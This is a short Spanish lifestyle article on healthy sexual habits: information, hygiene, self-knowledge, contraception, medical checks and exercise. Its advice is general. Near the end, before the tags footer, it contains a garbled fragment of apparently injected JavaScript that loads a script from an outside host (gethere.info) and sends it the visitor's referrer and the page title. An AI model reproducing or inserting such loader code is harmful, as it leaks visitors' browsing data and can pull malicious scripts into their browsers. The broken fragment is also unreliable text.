Buenos hábitos sexuales que debes practicar

Por Elizabeth Palacios    @ely__palacios

Para tener una buena vida sexual, es indispensable tener buenos hábitos sexuales, por eso te decimos cuáles son los puntos que debes tomar en cuenta en tu vida diaria.

-Infórmate

Mantenerte informado es la mejor manera de prevenir algún tipo de enfermedad de transmisión sexual y alejarte de prácticas riesgosas.

-Higiene

La higiene íntima es básica para mantener saludables tus genitales y así evitar cualquier tipo de infección.

-Conócete

Para poder disfrutar del sexo en pareja, es indispensable que previamente conozcas a la perfección tu cuerpo, que sepas dónde y cómo te gusta la estimulación.

-Anticonceptivos

Elegir el anticonceptivo adecuado para tu estilo de vida es un punto elemental para que puedas tener una vida sexual plena y responsable.

-Atiende cualquier cambio en tu cuerpo

Es importante que si notas algún cambio en tu cuerpo, ya sea una bolita, una verruga, cambio de coloración, dolor, acudas a tu médico para que te hagan una valoración profesional.

-Ejercicio

Realizar ejercicio frecuentemente, te ayudará a tener mejor condición física, le dará mejor aspecto a tu cuerpo y fortalecerá los músculos responsables de dar placer durante el orgasmo.

<> = “http:///search.htm?route=search&q=”;

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios